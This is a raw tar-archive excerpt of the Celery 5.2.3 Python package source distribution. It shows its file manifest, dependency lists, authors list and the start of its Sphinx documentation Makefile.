|wheel| image:: https://img.shields.io/pypi/wheel/celery.svg :alt: Celery can be installed via wheel :target: https://pypi.org/project/celery/ .. |pyversion| image:: https://img.shields.io/pypi/pyversions/celery.svg :alt: Supported Python versions. :target: https://pypi.org/project/celery/ .. |pyimp| image:: https://img.shields.io/pypi/implementation/celery.svg :alt: Supported Python implementations. :target: https://pypi.org/project/celery/ .. |ocbackerbadge| image:: https://opencollective.com/celery/backers/badge.svg :alt: Backers on Open Collective :target: #backers .. |ocsponsorbadge| image:: https://opencollective.com/celery/sponsors/badge.svg :alt: Sponsors on Open Collective :target: #sponsors .. |downloads| image:: https://pepy.tech/badge/celery :alt: Downloads :target: https://pepy.tech/project/celery ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1640757094.0 celery-5.2.3/celery.egg-info/SOURCES.txt0000664000175000017500000005040600000000000017543 0ustar00asifasif00000000000000CONTRIBUTORS.txt Changelog.rst LICENSE MANIFEST.in README.rst TODO pyproject.toml setup.cfg setup.py celery/__init__.py celery/__main__.py celery/_state.py celery/beat.py celery/bootsteps.py celery/canvas.py celery/exceptions.py celery/local.py celery/platforms.py celery/result.py celery/schedules.py celery/signals.py celery/states.py celery.egg-info/PKG-INFO celery.egg-info/SOURCES.txt celery.egg-info/dependency_links.txt celery.egg-info/entry_points.txt celery.egg-info/not-zip-safe celery.egg-info/requires.txt celery.egg-info/top_level.txt celery/app/__init__.py celery/app/amqp.py celery/app/annotations.py celery/app/autoretry.py celery/app/backends.py celery/app/base.py celery/app/builtins.py celery/app/control.py celery/app/defaults.py celery/app/events.py celery/app/log.py celery/app/registry.py celery/app/routes.py celery/app/task.py celery/app/trace.py celery/app/utils.py celery/apps/__init__.py celery/apps/beat.py celery/apps/multi.py celery/apps/worker.py celery/backends/__init__.py celery/backends/arangodb.py celery/backends/asynchronous.py celery/backends/azureblockblob.py celery/backends/base.py celery/backends/cache.py celery/backends/cassandra.py celery/backends/consul.py celery/backends/cosmosdbsql.py celery/backends/couchbase.py celery/backends/couchdb.py celery/backends/dynamodb.py celery/backends/elasticsearch.py celery/backends/filesystem.py celery/backends/mongodb.py celery/backends/redis.py celery/backends/rpc.py celery/backends/s3.py celery/backends/database/__init__.py celery/backends/database/models.py celery/backends/database/session.py celery/bin/__init__.py celery/bin/amqp.py celery/bin/base.py celery/bin/beat.py celery/bin/call.py celery/bin/celery.py celery/bin/control.py celery/bin/events.py celery/bin/graph.py celery/bin/list.py celery/bin/logtool.py celery/bin/migrate.py celery/bin/multi.py celery/bin/purge.py celery/bin/result.py celery/bin/shell.py celery/bin/upgrade.py celery/bin/worker.py celery/concurrency/__init__.py celery/concurrency/asynpool.py celery/concurrency/base.py celery/concurrency/eventlet.py celery/concurrency/gevent.py celery/concurrency/prefork.py celery/concurrency/solo.py celery/concurrency/thread.py celery/contrib/__init__.py celery/contrib/abortable.py celery/contrib/migrate.py celery/contrib/pytest.py celery/contrib/rdb.py celery/contrib/sphinx.py celery/contrib/testing/__init__.py celery/contrib/testing/app.py celery/contrib/testing/manager.py celery/contrib/testing/mocks.py 
celery/contrib/testing/tasks.py celery/contrib/testing/worker.py celery/events/__init__.py celery/events/cursesmon.py celery/events/dispatcher.py celery/events/dumper.py celery/events/event.py celery/events/receiver.py celery/events/snapshot.py celery/events/state.py celery/fixups/__init__.py celery/fixups/django.py celery/loaders/__init__.py celery/loaders/app.py celery/loaders/base.py celery/loaders/default.py celery/security/__init__.py celery/security/certificate.py celery/security/key.py celery/security/serialization.py celery/security/utils.py celery/utils/__init__.py celery/utils/abstract.py celery/utils/collections.py celery/utils/debug.py celery/utils/deprecated.py celery/utils/functional.py celery/utils/graph.py celery/utils/imports.py celery/utils/iso8601.py celery/utils/log.py celery/utils/nodenames.py celery/utils/objects.py celery/utils/saferepr.py celery/utils/serialization.py celery/utils/sysinfo.py celery/utils/term.py celery/utils/text.py celery/utils/threads.py celery/utils/time.py celery/utils/timer2.py celery/utils/dispatch/__init__.py celery/utils/dispatch/signal.py celery/utils/static/__init__.py celery/utils/static/celery_128.png celery/worker/__init__.py celery/worker/autoscale.py celery/worker/components.py celery/worker/control.py celery/worker/heartbeat.py celery/worker/loops.py celery/worker/pidbox.py celery/worker/request.py celery/worker/state.py celery/worker/strategy.py celery/worker/worker.py celery/worker/consumer/__init__.py celery/worker/consumer/agent.py celery/worker/consumer/connection.py celery/worker/consumer/consumer.py celery/worker/consumer/control.py celery/worker/consumer/events.py celery/worker/consumer/gossip.py celery/worker/consumer/heart.py celery/worker/consumer/mingle.py celery/worker/consumer/tasks.py docs/AUTHORS.txt docs/Makefile docs/THANKS docs/changelog.rst docs/community.rst docs/conf.py docs/configuration.html docs/contributing.rst docs/copyright.rst docs/faq.rst docs/glossary.rst docs/index.rst docs/make.bat docs/spelling_wordlist.txt docs/whatsnew-5.2.rst docs/_ext/celerydocs.py docs/_static/.keep docs/_templates/sidebardonations.html docs/django/first-steps-with-django.rst docs/django/index.rst docs/getting-started/first-steps-with-celery.rst docs/getting-started/index.rst docs/getting-started/introduction.rst docs/getting-started/next-steps.rst docs/getting-started/resources.rst docs/getting-started/backends-and-brokers/index.rst docs/getting-started/backends-and-brokers/rabbitmq.rst docs/getting-started/backends-and-brokers/redis.rst docs/getting-started/backends-and-brokers/sqs.rst docs/history/changelog-1.0.rst docs/history/changelog-2.0.rst docs/history/changelog-2.1.rst docs/history/changelog-2.2.rst docs/history/changelog-2.3.rst docs/history/changelog-2.4.rst docs/history/changelog-2.5.rst docs/history/changelog-3.0.rst docs/history/changelog-3.1.rst docs/history/changelog-4.0.rst docs/history/changelog-4.1.rst docs/history/changelog-4.2.rst docs/history/changelog-4.3.rst docs/history/changelog-4.4.rst docs/history/changelog-5.0.rst docs/history/changelog-5.1.rst docs/history/index.rst docs/history/whatsnew-2.5.rst docs/history/whatsnew-3.0.rst docs/history/whatsnew-3.1.rst docs/history/whatsnew-4.0.rst docs/history/whatsnew-4.1.rst docs/history/whatsnew-4.2.rst docs/history/whatsnew-4.3.rst docs/history/whatsnew-4.4.rst docs/history/whatsnew-5.0.rst docs/history/whatsnew-5.1.rst docs/images/celery-banner-small.png docs/images/celery-banner.png docs/images/celery_128.png docs/images/celery_512.png 
docs/images/celeryevshotsm.jpg docs/images/dashboard.png docs/images/favicon.ico docs/images/monitor.png docs/images/result_graph.png docs/images/worker_graph_full.png docs/includes/installation.txt docs/includes/introduction.txt docs/includes/resources.txt docs/internals/app-overview.rst docs/internals/deprecation.rst docs/internals/guide.rst docs/internals/index.rst docs/internals/protocol.rst docs/internals/worker.rst docs/internals/reference/celery._state.rst docs/internals/reference/celery.app.annotations.rst docs/internals/reference/celery.app.routes.rst docs/internals/reference/celery.app.trace.rst docs/internals/reference/celery.backends.arangodb.rst docs/internals/reference/celery.backends.asynchronous.rst docs/internals/reference/celery.backends.azureblockblob.rst docs/internals/reference/celery.backends.base.rst docs/internals/reference/celery.backends.cache.rst docs/internals/reference/celery.backends.cassandra.rst docs/internals/reference/celery.backends.consul.rst docs/internals/reference/celery.backends.cosmosdbsql.rst docs/internals/reference/celery.backends.couchbase.rst docs/internals/reference/celery.backends.couchdb.rst docs/internals/reference/celery.backends.database.models.rst docs/internals/reference/celery.backends.database.rst docs/internals/reference/celery.backends.database.session.rst docs/internals/reference/celery.backends.dynamodb.rst docs/internals/reference/celery.backends.elasticsearch.rst docs/internals/reference/celery.backends.filesystem.rst docs/internals/reference/celery.backends.mongodb.rst docs/internals/reference/celery.backends.redis.rst docs/internals/reference/celery.backends.rpc.rst docs/internals/reference/celery.backends.rst docs/internals/reference/celery.backends.s3.rst docs/internals/reference/celery.concurrency.base.rst docs/internals/reference/celery.concurrency.eventlet.rst docs/internals/reference/celery.concurrency.gevent.rst docs/internals/reference/celery.concurrency.prefork.rst docs/internals/reference/celery.concurrency.rst docs/internals/reference/celery.concurrency.solo.rst docs/internals/reference/celery.concurrency.thread.rst docs/internals/reference/celery.events.cursesmon.rst docs/internals/reference/celery.events.dumper.rst docs/internals/reference/celery.events.snapshot.rst docs/internals/reference/celery.platforms.rst docs/internals/reference/celery.security.certificate.rst docs/internals/reference/celery.security.key.rst docs/internals/reference/celery.security.serialization.rst docs/internals/reference/celery.security.utils.rst docs/internals/reference/celery.utils.abstract.rst docs/internals/reference/celery.utils.collections.rst docs/internals/reference/celery.utils.deprecated.rst docs/internals/reference/celery.utils.dispatch.rst docs/internals/reference/celery.utils.dispatch.signal.rst docs/internals/reference/celery.utils.functional.rst docs/internals/reference/celery.utils.graph.rst docs/internals/reference/celery.utils.imports.rst docs/internals/reference/celery.utils.iso8601.rst docs/internals/reference/celery.utils.log.rst docs/internals/reference/celery.utils.nodenames.rst docs/internals/reference/celery.utils.objects.rst docs/internals/reference/celery.utils.rst docs/internals/reference/celery.utils.saferepr.rst docs/internals/reference/celery.utils.serialization.rst docs/internals/reference/celery.utils.sysinfo.rst docs/internals/reference/celery.utils.term.rst docs/internals/reference/celery.utils.text.rst docs/internals/reference/celery.utils.threads.rst docs/internals/reference/celery.utils.time.rst 
docs/internals/reference/celery.utils.timer2.rst docs/internals/reference/celery.worker.autoscale.rst docs/internals/reference/celery.worker.components.rst docs/internals/reference/celery.worker.control.rst docs/internals/reference/celery.worker.heartbeat.rst docs/internals/reference/celery.worker.loops.rst docs/internals/reference/celery.worker.pidbox.rst docs/internals/reference/index.rst docs/reference/celery.app.amqp.rst docs/reference/celery.app.autoretry.rst docs/reference/celery.app.backends.rst docs/reference/celery.app.builtins.rst docs/reference/celery.app.control.rst docs/reference/celery.app.defaults.rst docs/reference/celery.app.events.rst docs/reference/celery.app.log.rst docs/reference/celery.app.registry.rst docs/reference/celery.app.rst docs/reference/celery.app.task.rst docs/reference/celery.app.utils.rst docs/reference/celery.apps.beat.rst docs/reference/celery.apps.multi.rst docs/reference/celery.apps.worker.rst docs/reference/celery.beat.rst docs/reference/celery.bin.base.rst docs/reference/celery.bin.beat.rst docs/reference/celery.bin.call.rst docs/reference/celery.bin.celery.rst docs/reference/celery.bin.control.rst docs/reference/celery.bin.events.rst docs/reference/celery.bin.graph.rst docs/reference/celery.bin.list.rst docs/reference/celery.bin.logtool.rst docs/reference/celery.bin.migrate.rst docs/reference/celery.bin.multi.rst docs/reference/celery.bin.purge.rst docs/reference/celery.bin.result.rst docs/reference/celery.bin.shell.rst docs/reference/celery.bin.upgrade.rst docs/reference/celery.bin.worker.rst docs/reference/celery.bootsteps.rst docs/reference/celery.contrib.abortable.rst docs/reference/celery.contrib.migrate.rst docs/reference/celery.contrib.pytest.rst docs/reference/celery.contrib.rdb.rst docs/reference/celery.contrib.sphinx.rst docs/reference/celery.contrib.testing.app.rst docs/reference/celery.contrib.testing.manager.rst docs/reference/celery.contrib.testing.mocks.rst docs/reference/celery.contrib.testing.worker.rst docs/reference/celery.events.dispatcher.rst docs/reference/celery.events.event.rst docs/reference/celery.events.receiver.rst docs/reference/celery.events.rst docs/reference/celery.events.state.rst docs/reference/celery.exceptions.rst docs/reference/celery.loaders.app.rst docs/reference/celery.loaders.base.rst docs/reference/celery.loaders.default.rst docs/reference/celery.loaders.rst docs/reference/celery.result.rst docs/reference/celery.rst docs/reference/celery.schedules.rst docs/reference/celery.security.rst docs/reference/celery.signals.rst docs/reference/celery.states.rst docs/reference/celery.utils.debug.rst docs/reference/celery.worker.consumer.agent.rst docs/reference/celery.worker.consumer.connection.rst docs/reference/celery.worker.consumer.consumer.rst docs/reference/celery.worker.consumer.control.rst docs/reference/celery.worker.consumer.events.rst docs/reference/celery.worker.consumer.gossip.rst docs/reference/celery.worker.consumer.heart.rst docs/reference/celery.worker.consumer.mingle.rst docs/reference/celery.worker.consumer.rst docs/reference/celery.worker.consumer.tasks.rst docs/reference/celery.worker.request.rst docs/reference/celery.worker.rst docs/reference/celery.worker.state.rst docs/reference/celery.worker.strategy.rst docs/reference/celery.worker.worker.rst docs/reference/cli.rst docs/reference/index.rst docs/sec/CELERYSA-0001.txt docs/sec/CELERYSA-0002.txt docs/sec/CELERYSA-0003.txt docs/templates/readme.txt docs/tutorials/daemonizing.html docs/tutorials/debugging.html docs/tutorials/index.rst 
docs/tutorials/task-cookbook.rst docs/userguide/application.rst docs/userguide/calling.rst docs/userguide/canvas.rst docs/userguide/configuration.rst docs/userguide/daemonizing.rst docs/userguide/debugging.rst docs/userguide/extending.rst docs/userguide/index.rst docs/userguide/monitoring.rst docs/userguide/optimizing.rst docs/userguide/periodic-tasks.rst docs/userguide/routing.rst docs/userguide/security.rst docs/userguide/signals.rst docs/userguide/sphinx.rst docs/userguide/tasks.rst docs/userguide/testing.rst docs/userguide/workers.rst docs/userguide/concurrency/eventlet.rst docs/userguide/concurrency/index.rst examples/README.rst examples/app/myapp.py examples/celery_http_gateway/README.rst examples/celery_http_gateway/__init__.py examples/celery_http_gateway/manage.py examples/celery_http_gateway/settings.py examples/celery_http_gateway/tasks.py examples/celery_http_gateway/urls.py examples/django/README.rst examples/django/manage.py examples/django/requirements.txt examples/django/demoapp/__init__.py examples/django/demoapp/models.py examples/django/demoapp/tasks.py examples/django/demoapp/views.py examples/django/demoapp/migrations/0001_initial.py examples/django/demoapp/migrations/__init__.py examples/django/proj/__init__.py examples/django/proj/celery.py examples/django/proj/settings.py examples/django/proj/urls.py examples/django/proj/wsgi.py examples/eventlet/README.rst examples/eventlet/bulk_task_producer.py examples/eventlet/celeryconfig.py examples/eventlet/tasks.py examples/eventlet/webcrawler.py examples/gevent/celeryconfig.py examples/gevent/tasks.py examples/next-steps/setup.py examples/next-steps/proj/__init__.py examples/next-steps/proj/celery.py examples/next-steps/proj/tasks.py examples/periodic-tasks/myapp.py examples/resultgraph/tasks.py examples/security/mysecureapp.py examples/security/ssl/worker.key examples/security/ssl/worker.pem examples/tutorial/tasks.py extra/bash-completion/celery.bash extra/generic-init.d/celerybeat extra/generic-init.d/celeryd extra/macOS/org.celeryq.beat.plist extra/macOS/org.celeryq.worker.plist extra/supervisord/celery.sh extra/supervisord/celerybeat.conf extra/supervisord/celeryd.conf extra/supervisord/supervisord.conf extra/systemd/celery.conf extra/systemd/celery.service extra/systemd/celery.tmpfiles extra/systemd/celerybeat.service extra/zsh-completion/celery.zsh requirements/README.rst requirements/default.txt requirements/dev.txt requirements/docs.txt requirements/pkgutils.txt requirements/security.txt requirements/test-ci-base.txt requirements/test-ci-default.txt requirements/test-integration.txt requirements/test-pypy3.txt requirements/test.txt requirements/deps/mock.txt requirements/extras/arangodb.txt requirements/extras/auth.txt requirements/extras/azureblockblob.txt requirements/extras/brotli.txt requirements/extras/cassandra.txt requirements/extras/consul.txt requirements/extras/cosmosdbsql.txt requirements/extras/couchbase.txt requirements/extras/couchdb.txt requirements/extras/django.txt requirements/extras/dynamodb.txt requirements/extras/elasticsearch.txt requirements/extras/eventlet.txt requirements/extras/gevent.txt requirements/extras/librabbitmq.txt requirements/extras/memcache.txt requirements/extras/mongodb.txt requirements/extras/msgpack.txt requirements/extras/pymemcache.txt requirements/extras/pyro.txt requirements/extras/pytest.txt requirements/extras/redis.txt requirements/extras/s3.txt requirements/extras/slmq.txt requirements/extras/solar.txt requirements/extras/sphinxautobuild.txt 
requirements/extras/sqlalchemy.txt requirements/extras/sqs.txt requirements/extras/tblib.txt requirements/extras/thread.txt requirements/extras/yaml.txt requirements/extras/zeromq.txt requirements/extras/zookeeper.txt requirements/extras/zstd.txt t/__init__.py t/skip.py t/benchmarks/bench_worker.py t/integration/__init__.py t/integration/conftest.py t/integration/tasks.py t/integration/test_backend.py t/integration/test_canvas.py t/integration/test_inspect.py t/integration/test_security.py t/integration/test_tasks.py t/unit/__init__.py t/unit/conftest.py t/unit/test_canvas.py t/unit/app/__init__.py t/unit/app/test_amqp.py t/unit/app/test_annotations.py t/unit/app/test_app.py t/unit/app/test_backends.py t/unit/app/test_beat.py t/unit/app/test_builtins.py t/unit/app/test_celery.py t/unit/app/test_control.py t/unit/app/test_defaults.py t/unit/app/test_exceptions.py t/unit/app/test_loaders.py t/unit/app/test_log.py t/unit/app/test_registry.py t/unit/app/test_routes.py t/unit/app/test_schedules.py t/unit/app/test_utils.py t/unit/apps/__init__.py t/unit/apps/test_multi.py t/unit/backends/__init__.py t/unit/backends/test_arangodb.py t/unit/backends/test_asynchronous.py t/unit/backends/test_azureblockblob.py t/unit/backends/test_base.py t/unit/backends/test_cache.py t/unit/backends/test_cassandra.py t/unit/backends/test_consul.py t/unit/backends/test_cosmosdbsql.py t/unit/backends/test_couchbase.py t/unit/backends/test_couchdb.py t/unit/backends/test_database.py t/unit/backends/test_dynamodb.py t/unit/backends/test_elasticsearch.py t/unit/backends/test_filesystem.py t/unit/backends/test_mongodb.py t/unit/backends/test_redis.py t/unit/backends/test_rpc.py t/unit/backends/test_s3.py t/unit/bin/__init__.py t/unit/bin/celery.py t/unit/bin/test_multi.py t/unit/bin/proj/__init__.py t/unit/bin/proj/app.py t/unit/bin/proj/app2.py t/unit/concurrency/__init__.py t/unit/concurrency/test_concurrency.py t/unit/concurrency/test_eventlet.py t/unit/concurrency/test_gevent.py t/unit/concurrency/test_pool.py t/unit/concurrency/test_prefork.py t/unit/concurrency/test_solo.py t/unit/concurrency/test_thread.py t/unit/contrib/__init__.py t/unit/contrib/test_abortable.py t/unit/contrib/test_migrate.py t/unit/contrib/test_pytest.py t/unit/contrib/test_rdb.py t/unit/contrib/test_sphinx.py t/unit/contrib/proj/__init__.py t/unit/contrib/proj/conf.py t/unit/contrib/proj/contents.rst t/unit/contrib/proj/foo.py t/unit/contrib/proj/xyzzy.py t/unit/events/__init__.py t/unit/events/test_cursesmon.py t/unit/events/test_events.py t/unit/events/test_snapshot.py t/unit/events/test_state.py t/unit/fixups/__init__.py t/unit/fixups/test_django.py t/unit/security/__init__.py t/unit/security/case.py t/unit/security/test_certificate.py t/unit/security/test_key.py t/unit/security/test_security.py t/unit/security/test_serialization.py t/unit/tasks/__init__.py t/unit/tasks/test_canvas.py t/unit/tasks/test_chord.py t/unit/tasks/test_context.py t/unit/tasks/test_result.py t/unit/tasks/test_states.py t/unit/tasks/test_tasks.py t/unit/tasks/test_trace.py t/unit/tasks/unit_tasks.py t/unit/utils/__init__.py t/unit/utils/test_collections.py t/unit/utils/test_debug.py t/unit/utils/test_deprecated.py t/unit/utils/test_dispatcher.py t/unit/utils/test_functional.py t/unit/utils/test_graph.py t/unit/utils/test_imports.py t/unit/utils/test_local.py t/unit/utils/test_nodenames.py t/unit/utils/test_objects.py t/unit/utils/test_pickle.py t/unit/utils/test_platforms.py t/unit/utils/test_saferepr.py t/unit/utils/test_serialization.py 
t/unit/utils/test_sysinfo.py t/unit/utils/test_term.py t/unit/utils/test_text.py t/unit/utils/test_threads.py t/unit/utils/test_time.py t/unit/utils/test_timer2.py t/unit/utils/test_utils.py t/unit/worker/__init__.py t/unit/worker/test_autoscale.py t/unit/worker/test_bootsteps.py t/unit/worker/test_components.py t/unit/worker/test_consumer.py t/unit/worker/test_control.py t/unit/worker/test_heartbeat.py t/unit/worker/test_loops.py t/unit/worker/test_request.py t/unit/worker/test_revoke.py t/unit/worker/test_state.py t/unit/worker/test_strategy.py t/unit/worker/test_worker.py././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1640757094.0 celery-5.2.3/celery.egg-info/dependency_links.txt0000664000175000017500000000000100000000000021720 0ustar00asifasif00000000000000 ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1640757094.0 celery-5.2.3/celery.egg-info/entry_points.txt0000664000175000017500000000006100000000000021145 0ustar00asifasif00000000000000[console_scripts] celery = celery.__main__:main ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1636334086.0 celery-5.2.3/celery.egg-info/not-zip-safe0000664000175000017500000000000100000000000020100 0ustar00asifasif00000000000000 ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1640757094.0 celery-5.2.3/celery.egg-info/requires.txt0000664000175000017500000000263600000000000020261 0ustar00asifasif00000000000000pytz>=2021.3 billiard<4.0,>=3.6.4.0 kombu<6.0,>=5.2.3 vine<6.0,>=5.0.0 click<9.0,>=8.0.3 click-didyoumean>=0.0.3 click-repl>=0.2.0 click-plugins>=1.1.1 setuptools<59.7.0,>=59.1.1 [arangodb] pyArango>=1.3.2 [auth] cryptography [azureblockblob] azure-storage-blob==12.9.0 [brotli] [brotli:platform_python_implementation == "CPython"] brotli>=1.0.0 [brotli:platform_python_implementation == "PyPy"] brotlipy>=0.7.0 [cassandra] cassandra-driver<3.21.0 [consul] python-consul2 [cosmosdbsql] pydocumentdb==2.3.2 [couchbase] [couchbase:platform_python_implementation != "PyPy" and (platform_system != "Windows" or python_version < "3.10")] couchbase>=3.0.0 [couchdb] pycouchdb [django] Django>=1.11 [dynamodb] boto3>=1.9.178 [elasticsearch] elasticsearch [eventlet] [eventlet:python_version < "3.10"] eventlet>=0.32.0 [gevent] gevent>=1.5.0 [librabbitmq] librabbitmq>=1.5.0 [memcache] [memcache:platform_system != "Windows"] pylibmc [mongodb] pymongo[srv]>=3.11.1 [msgpack] msgpack [pymemcache] python-memcached [pyro] pyro4 [pytest] pytest-celery [redis] redis!=4.0.0,!=4.0.1,>=3.4.1 [s3] boto3>=1.9.125 [slmq] softlayer_messaging>=1.0.3 [solar] [solar:platform_python_implementation != "PyPy"] ephem [sqlalchemy] sqlalchemy [sqs] kombu[sqs] [tblib] [tblib:python_version < "3.8.0"] tblib>=1.3.0 [tblib:python_version >= "3.8.0"] tblib>=1.5.0 [yaml] PyYAML>=3.10 [zookeeper] kazoo>=1.3.1 [zstd] zstandard ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1640757094.0 celery-5.2.3/celery.egg-info/top_level.txt0000664000175000017500000000000700000000000020401 0ustar00asifasif00000000000000celery ././@PaxHeader0000000000000000000000000000003400000000000011452 xustar000000000000000028 mtime=1640757094.5437522 celery-5.2.3/docs/0000775000175000017500000000000000000000000013625 5ustar00asifasif00000000000000././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 
celery-5.2.3/docs/AUTHORS.txt0000664000175000017500000001225500000000000015520 0ustar00asifasif00000000000000========= AUTHORS ========= :order: sorted Aaron Ross Adam Endicott Adriano Petrich Akira Matsuzaki Alan Brogan Alec Clowes Ales Zoulek Allan Caffee Andrew McFague Andrew Watts Armin Ronacher Arpan Shah Ask Solem Augusto Becciu Balachandran C Bartosz Ptaszynski Ben Firshman Brad Jasper Branko Čibej Brendon Crawford Brian Bouterse Brian Rosner Bryan Berg Chase Seibert Chris Adams Chris Angove Chris Chamberlin Chris Rose Chris St. Pierre Chris Streeter Christoph Burgmer Christopher Peplin Clay Gerrard Dan McGee Daniel Hepper Daniel Lundin Daniel Watkins David Arthur David Cramer David Miller David Strauss David White Eran Rundstein Felix Berger Florian Apolloner Frédéric Junod Gert Van Gool Greg Haskins Greg Taylor Grégoire Cachet Gunnlaugur Thor Briem Hari Harm Verhagen Honza Kral Ian A Wilson Ignas Mikalajūnas Ionel Maries Cristian Ionut Turturica Iurii Kriachko Ivan Metzlar Jannis Leidel Jason Baker Jay McGrath Jeff Balogh Jeff Terrace Jerzy Kozera Jesper Noehr John Watson John Whitlock Jonas Haag Jonas Obrist Jonatan Heyman Joshua Ginsberg Juan Ignacio Catalano Juarez Bochi Jude Nagurney Julien Poissonnier Keith Perkins Kevin Tran Kornelijus Survila Leo Dirac Luis Clara Gomez Lukas Linhart Luke Zapart Marcin Kuźmiński Marcin Lulek Mark Hellewell Mark Lavin Mark Parncutt Mark Stover Mark Thurman Martin Galpin Martin Melin Matt Ullman Matt Williamson Matthew J Morrison Matthew Miller Mauro Rocco Maxim Bodyansky Mher Movsisyan Michael Elsdoerfer Michael Fladischer Miguel Hernandez Martos Mikhail Gusarov Mikhail Korobov Mitar Môshe van der Sterre Neil Chintomby Noah Kantrowitz Norman Richards Patrick Altman Peter Bittner Piotr Sikora Primož Kerin Remy Noel Reza Lotun Roberto Gaiser Roger Hu Rune Halvorsen Ryan P. Kelly Ryan Petrello Sam Cooke Sean Creeley Sean O'Connor Seong Won Mun Simon Josi Steeve Morin Stefan Kjartansson Steven Skoczen Tayfun Sen Thomas Johansson Thomas Forbes Timo Sugliani Travis Swicegood Vincent Driessen Vitaly Babiy Vladimir Kryachko Wes Turner Wes Winham Yury V. Zaytsev jpellerin kuno lookfwd sdcooke Łukasz Langa Łukasz Oleś ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/docs/Makefile0000664000175000017500000001765700000000000015305 0ustar00asifasif00000000000000# Makefile for Sphinx documentation # # You can set these variables from the command line. SPHINXOPTS = SPHINXBUILD = sphinx-build PAPER = BUILDDIR = _build SOURCEDIR = . APP = /docs # Internal variables. PAPEROPT_a4 = -D latex_paper_size=a4 PAPEROPT_letter = -D latex_paper_size=letter ALLSPHINXOPTS = -d $(BUILDDIR)/doctrees $(PAPEROPT_$(PAPER)) $(SPHINXOPTS) . # the i18n builder cannot share the environment and doctrees with the others I18NSPHINXOPTS = $(PAPEROPT_$(PAPER)) $(SPHINXOPTS) . 
.PHONY: help help: @echo "Please use \`make ' where is one of" @echo " html to make standalone HTML files" @echo " livehtml to start a local server hosting the docs" @echo " dirhtml to make HTML files named index.html in directories" @echo " singlehtml to make a single large HTML file" @echo " pickle to make pickle files" @echo " json to make JSON files" @echo " htmlhelp to make HTML files and a HTML help project" @echo " qthelp to make HTML files and a qthelp project" @echo " applehelp to make an Apple Help Book" @echo " devhelp to make HTML files and a Devhelp project" @echo " epub to make an epub" @echo " epub3 to make an epub3" @echo " latex to make LaTeX files, you can set PAPER=a4 or PAPER=letter" @echo " latexpdf to make LaTeX files and run them through pdflatex" @echo " latexpdfja to make LaTeX files and run them through platex/dvipdfmx" @echo " text to make text files" @echo " man to make manual pages" @echo " texinfo to make Texinfo files" @echo " info to make Texinfo files and run them through makeinfo" @echo " gettext to make PO message catalogs" @echo " changes to make an overview of all changed/added/deprecated items" @echo " xml to make Docutils-native XML files" @echo " pseudoxml to make pseudoxml-XML files for display purposes" @echo " linkcheck to check all external links for integrity" @echo " doctest to run all doctests embedded in the documentation (if enabled)" @echo " coverage to run coverage check of the documentation (if enabled)" @echo " apicheck to verify that all modules are present in autodoc" @echo " configcheck to verify that all modules are present in autodoc" @echo " spelling to perform a spell check" .PHONY: clean clean: rm -rf $(BUILDDIR)/* .PHONY: html html: $(SPHINXBUILD) -b html $(ALLSPHINXOPTS) $(BUILDDIR)/html @echo @echo "Build finished. The HTML pages are in $(BUILDDIR)/html." .PHONY: dirhtml dirhtml: $(SPHINXBUILD) -b dirhtml $(ALLSPHINXOPTS) $(BUILDDIR)/dirhtml @echo @echo "Build finished. The HTML pages are in $(BUILDDIR)/dirhtml." .PHONY: singlehtml singlehtml: $(SPHINXBUILD) -b singlehtml $(ALLSPHINXOPTS) $(BUILDDIR)/singlehtml @echo @echo "Build finished. The HTML page is in $(BUILDDIR)/singlehtml." .PHONY: pickle pickle: $(SPHINXBUILD) -b pickle $(ALLSPHINXOPTS) $(BUILDDIR)/pickle @echo @echo "Build finished; now you can process the pickle files." .PHONY: json json: $(SPHINXBUILD) -b json $(ALLSPHINXOPTS) $(BUILDDIR)/json @echo @echo "Build finished; now you can process the JSON files." .PHONY: htmlhelp htmlhelp: $(SPHINXBUILD) -b htmlhelp $(ALLSPHINXOPTS) $(BUILDDIR)/htmlhelp @echo @echo "Build finished; now you can run HTML Help Workshop with the" \ ".hhp project file in $(BUILDDIR)/htmlhelp." .PHONY: qthelp qthelp: $(SPHINXBUILD) -b qthelp $(ALLSPHINXOPTS) $(BUILDDIR)/qthelp @echo @echo "Build finished; now you can run "qcollectiongenerator" with the" \ ".qhcp project file in $(BUILDDIR)/qthelp, like this:" @echo "# qcollectiongenerator $(BUILDDIR)/qthelp/PROJ.qhcp" @echo "To view the help file:" @echo "# assistant -collectionFile $(BUILDDIR)/qthelp/PROJ.qhc" .PHONY: applehelp applehelp: $(SPHINXBUILD) -b applehelp $(ALLSPHINXOPTS) $(BUILDDIR)/applehelp @echo @echo "Build finished. The help book is in $(BUILDDIR)/applehelp." @echo "N.B. You won't be able to view it unless you put it in" \ "~/Library/Documentation/Help or install it in your application" \ "bundle." .PHONY: devhelp devhelp: $(SPHINXBUILD) -b devhelp $(ALLSPHINXOPTS) $(BUILDDIR)/devhelp @echo @echo "Build finished." 
@echo "To view the help file:" @echo "# mkdir -p $$HOME/.local/share/devhelp/PROJ" @echo "# ln -s $(BUILDDIR)/devhelp $$HOME/.local/share/devhelp/PROJ" @echo "# devhelp" .PHONY: epub epub: $(SPHINXBUILD) -b epub $(ALLSPHINXOPTS) $(BUILDDIR)/epub @echo @echo "Build finished. The epub file is in $(BUILDDIR)/epub." .PHONY: epub3 epub3: $(SPHINXBUILD) -b epub3 $(ALLSPHINXOPTS) $(BUILDDIR)/epub3 @echo @echo "Build finished. The epub3 file is in $(BUILDDIR)/epub3." .PHONY: latex latex: $(SPHINXBUILD) -b latex $(ALLSPHINXOPTS) $(BUILDDIR)/latex @echo @echo "Build finished; the LaTeX files are in $(BUILDDIR)/latex." @echo "Run \`make' in that directory to run these through (pdf)latex" \ "(use \`make latexpdf' here to do that automatically)." .PHONY: latexpdf latexpdf: $(SPHINXBUILD) -b latex $(ALLSPHINXOPTS) $(BUILDDIR)/latex @echo "Running LaTeX files through pdflatex..." $(MAKE) -C $(BUILDDIR)/latex all-pdf @echo "pdflatex finished; the PDF files are in $(BUILDDIR)/latex." .PHONY: latexpdfja latexpdfja: $(SPHINXBUILD) -b latex $(ALLSPHINXOPTS) 